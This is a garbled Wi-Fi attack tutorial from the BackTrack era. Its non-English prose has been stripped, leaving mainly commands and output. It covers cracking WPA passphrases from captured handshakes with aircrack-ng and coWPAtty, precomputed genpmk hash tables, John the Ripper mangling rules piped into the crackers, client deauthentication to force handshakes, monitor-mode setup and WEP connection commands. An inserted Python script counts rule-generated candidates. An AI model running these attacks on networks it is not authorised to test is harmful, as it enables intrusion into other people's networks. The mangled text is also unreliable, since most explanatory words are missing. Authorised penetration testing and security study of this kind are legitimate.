aircrack-ng -e AP_SID -w dictionary_file capture_file

(BackTrack v3):
aircrack-ng -e snb -w /pentest/wireless/cowpatty-4.0/dict Kismet-Jan-15-2008-1.dump
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                 B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


aircrack-ng hashes ,

coWPAtty
coWPAtty , :
/pentest/wireless/cowpatty-4.0. Then run:
:
./cowpatty -s AP_SID -f dictionary_file -r capture_file

:
./cowpatty -s snb -f dict -r Kismet-Jan-15-2008-1.dump

coWPAtty aircrack , updates 1000


.
coWPAtty hashes
WPA key. hash tables Rainbow Tables
crack,
hash table files .
, - hashes ,
hash WPA key ,
passphrase plaintext. WPA keys SSID,
AP's SSID hash
tables.
hash tables
. .. WiFi (Church of WiFi) hash tables 1000
SSID's passphrases.
hash table genpmk,
coWPAtty:
:
./genpmk -s AP_SID -f dictionary_file -d hash_output_file

:
./genpmk -s snb -f dict -d dict_hash

hash table, crack 1/1000 .


:
./cowpatty -s AP_SID -d hash_output_file -r capture_file

:
./cowpatty -s snb -d dict_hash -r Kismet-Jan-15-2008-1.dump


Crack
dictionary
. Passphrases dinosaur my wpa key coWPAtty
aircrack. dinosaur52 my Wp@ k3y;
dictionary bruteforce
, !
, ..
(*) (rules) cracking *NIX John the Ripper(JtR). ,
dictionary
input coWPAtty aircrack-ng on the fly. (*)
mangling (!!!)

dictionary attacks, passphrases


. coWPAtty aircrack-ng
8 .
mangling rules JtR
AP.
default mangling rules John, coWPAtty,
aircrack-ng. ( /usr/local/john-1.7.2 BackTrack v3, /pentest/password/john-1.7.2 v2):
coWPAtty:
./john --wordlist=password_list --rules --stdout
| cowpatty -s ssid -f - -r capture_file

aircrack-ng:
./john --wordlist=password_list --rules --stdout
| aircrack-ng -e ssid -w - capture_file

:
./john --wordlist=password.lst --rules --stdout
| aircrack-ng -e snb -w - Kismet-Jan-15-2008-1.dump

John set ,
documented "regex-esque" .
, default rules dictionary.
john.conf
section [List.Rules:Wordlist] ( 262) :

$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]

999
dictionary ( dinosaur52 )

. 3 1
:

sE3
sl1
sE3sl1


glid335 :
sE3$[0-9]
sE3$[0-9]$[0-9]
sE3$[0-9]$[0-9]$[0-9]
sl1$[0-9]
sl1$[0-9]$[0-9]
sl1$[0-9]$[0-9]$[0-9]
sE3sl1$[0-9]
sE3sl1$[0-9]$[0-9]
sE3sl1$[0-9]$[0-9]$[0-9]

, dictionary
passphrases.


passphrase ;
! JtR
passphrases
dictionaries.
John,
.
wordlist coWPAtty 10.201 . John
489.989.
45.720.022! ,
.
out
there. ,

, 45 passphrases
, 6 ...
45
, ,
WPA passphrase , ..
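An added mini-interpreter (not John the Ripper's code) for the two rule commands used in the rules above, so the inflation of the candidate space by a rule set can be counted for a given wordlist; it assumes the preprocessor expands every [...] list to all combinations, which is what the 100 rules produced by $[0-9]$[0-9] imply.

```python
import itertools
import re

# The rule lines discussed above, in john.conf [List.Rules:Wordlist] syntax.
PAGE_RULES = [
    "$[0-9]$[0-9]", "$[0-9]$[0-9]$[0-9]",
    "sE3", "sl1", "sE3sl1",
    "sE3$[0-9]", "sE3$[0-9]$[0-9]", "sE3$[0-9]$[0-9]$[0-9]",
    "sl1$[0-9]", "sl1$[0-9]$[0-9]", "sl1$[0-9]$[0-9]$[0-9]",
    "sE3sl1$[0-9]", "sE3sl1$[0-9]$[0-9]", "sE3sl1$[0-9]$[0-9]$[0-9]",
]


def expand_class(spec: str) -> list:
    # "0-9" -> ["0", ..., "9"]; ranges and literal characters are supported.
    chars = []
    i = 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(spec[i])
            i += 1
    return chars


def expand_preprocessor(rule: str) -> list:
    # Each [...] list is expanded and the rule is emitted once per combination
    # (assumption noted in the lead-in), so "$[0-9]$[0-9]" yields 100 concrete rules.
    parts = re.split(r"(\[[^\]]*\])", rule)
    choices = [expand_class(p[1:-1]) if p.startswith("[") and p.endswith("]") else [p]
               for p in parts]
    return ["".join(combo) for combo in itertools.product(*choices)]


def apply_rule(rule: str, word: str) -> str:
    # Interprets the commands used in the rules above: sXY (replace every X with Y)
    # and $X (append X); ':' is the no-op rule. Anything else is rejected, not guessed.
    i = 0
    while i < len(rule):
        cmd = rule[i]
        if cmd == "s":
            word = word.replace(rule[i + 1], rule[i + 2])
            i += 3
        elif cmd == "$":
            word += rule[i + 1]
            i += 2
        elif cmd == ":":
            i += 1
        else:
            raise ValueError(f"unsupported rule command {cmd!r}")
    return word


def mangle(words, rules) -> list:
    # Distinct candidates the rule set produces from the wordlist, in emission order;
    # duplicates are dropped so the length is the size of the search space.
    seen = set()
    out = []
    for rule in rules:
        for concrete in expand_preprocessor(rule):
            for w in words:
                cand = apply_rule(concrete, w)
                if cand not in seen:
                    seen.add(cand)
                    out.append(cand)
    return out
```

For a word like "dinosaur" that contains neither "E" nor "l" the substitution rules collapse, so the count is the 1 + 10 + 100 + 1000 digit suffixes; a word containing both letters gets 4433 distinct candidates from the same rules.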

13. ...
Four-way Handshake!
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.


four-way handshake. '


tips:

H mode client AP. , ,


mode client/AP G, handshake.
APs clients turbo mode
. drivers mode iwconfig
mode (. iwconfig).
1, 2, 5.5 11Mbit 6, 9, 12, 18, 24, 36, 48, 54Mbit G..
AP auto,
1MB, 2MB, 11MB, 54MB
AP.
-c <channel of AP> airodump-ng.
network/connection managers
mode .
AP client
(corrupted) .
drivers, driver,
.
, client
handshake.
deauth ,
client . deauth . deauth
client
four-way handshake. deauths clients
broadcasting. client deauth ,
tcpdump wireshark ACK client .
, client deauthentication .
WPA Packet Capture Explained tutorial
AP client


four-way handshake. , ,
.
, airodump-ng BSSID
IV's.
AP. BSSID
, acknowledgements (ACKs), .
BSSID , airodump.

14.
monitor mode chipsets atheros:
interface:
airmon-ng stop [interface]
ifconfig [interface] down
Intel PRO/Wireless 3945ABG
modprobe -r iwl3945
modprobe ipwraw
modprobe iwl3945


Intel PRO/Wireless 2100/2200


modprobe -r ipw2100/2200
modprobe ipwraw
modprobe ipw2100/2200
interface:
ifconfig [interface] up
airmon-ng start [interface]
: (monitor mode enabled)

-todo open wep wlan (dhcp):

iwconfig [interface] mode managed key [WEP key]


(128 bit WEP - 26 hex , 64 bit WEP - 10)
iwconfig essid [ESSID]
( ESSID )
dhclient [interface]
( IP address, netmask, DNS server & default gateway P)

open wep wlan (manual):


iwconfig [interface] mode managed key [WEP key]
(128 bit WEP use 26 hex characters, 64 bit WEP uses 10)
iwconfig essid "[ESSID]"
ifconfig [interface] [IP address] netmask [subnetmask]
route add default gw [IP of default gateway]
(default gateway, IP Access Point)
echo nameserver [IP address of DNS server] >> /etc/resolv.conf
(Configure DNS server)


Madwifi-ng Commands:
madwifi access points (VAPS), wireless
wireless . (wireless card = wifi0)
wlanconfig athx destroy
( athx VAP)
wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor]
athx VAP

ifconfig Commands:
ifconfig [interface] up
( interface)
ifconfig [interface] down
( interface)
ifconfig [interface] [IP address] netmask [subnet-mask]
( IP subnet-mask)
ifconfig [interface] hw ether [MAC]
( mac address wireless )


iwconfig Commands:
iwconfig [interface] mode [master|managed|adhoc|monitor]
iwconfig [interface] essid [any|essid]
iwconfig [interface] key [hex|s:ascii|off|open]
iwconfig [interface] channel [#|auto]
iwconfig [interface] freq 2.422G
iwconfig [interface] ap [mac address]
iwconfig [interface] rate [auto|#M]

iwpriv Commands:
iwpriv [interface] monitor [A] [B]
[A]
0 = disable monitor mode
1 = enable monitor mode with Prism2 header
2 = enable monitor mode with no Prism2
[B] Channel to monitor (1-14)

mac address vendor list

00:11:2F  ASUSTek Computer Inc.
00:11:25  Cisco Systems
00:11:20  IBM Corporation
00:11:22  Cimsys
00:11:95  D-Link
00:11:98  PrismMedia
00:0C:87  Amd
00:0C:F1  Intel

http://anonsvn.wireshark.org/wireshark/trunk/manuf

e-books
Sohail/Vivek: Caffe-Latte attack
hakin9: WiFi Security
Bittau/Handley/Lackey: The final nail in wep's coffin
Bittau: Fragmentation Attack in Practice
Foundstone (antoniewitz): 802.11 Attacks
Levente Buttyán/László Dóra: WiFi Security WEP and 802.11i
Richard Yang:Security and Cooperation in Wireless and Mobile Networks
Pyshkin/Tews/Weinmann:Breaking 104 bit WEP in less than 60 seconds
Changhua/Mitchell: Analysis of the 802.11i 4-Way Handshake
PGP corp: Introduction to cryptography
Logicallysecure:Wireless linux commands
websites
Wikipedia
Aircrack-ng wiki
wi-fiplanet.com
infoworld.com
airtightnetworks.com
remote-exploit.org
madwifi.org


lifehack.ws
kismetwireless.net

: CC 3.0 attribution-sharealike
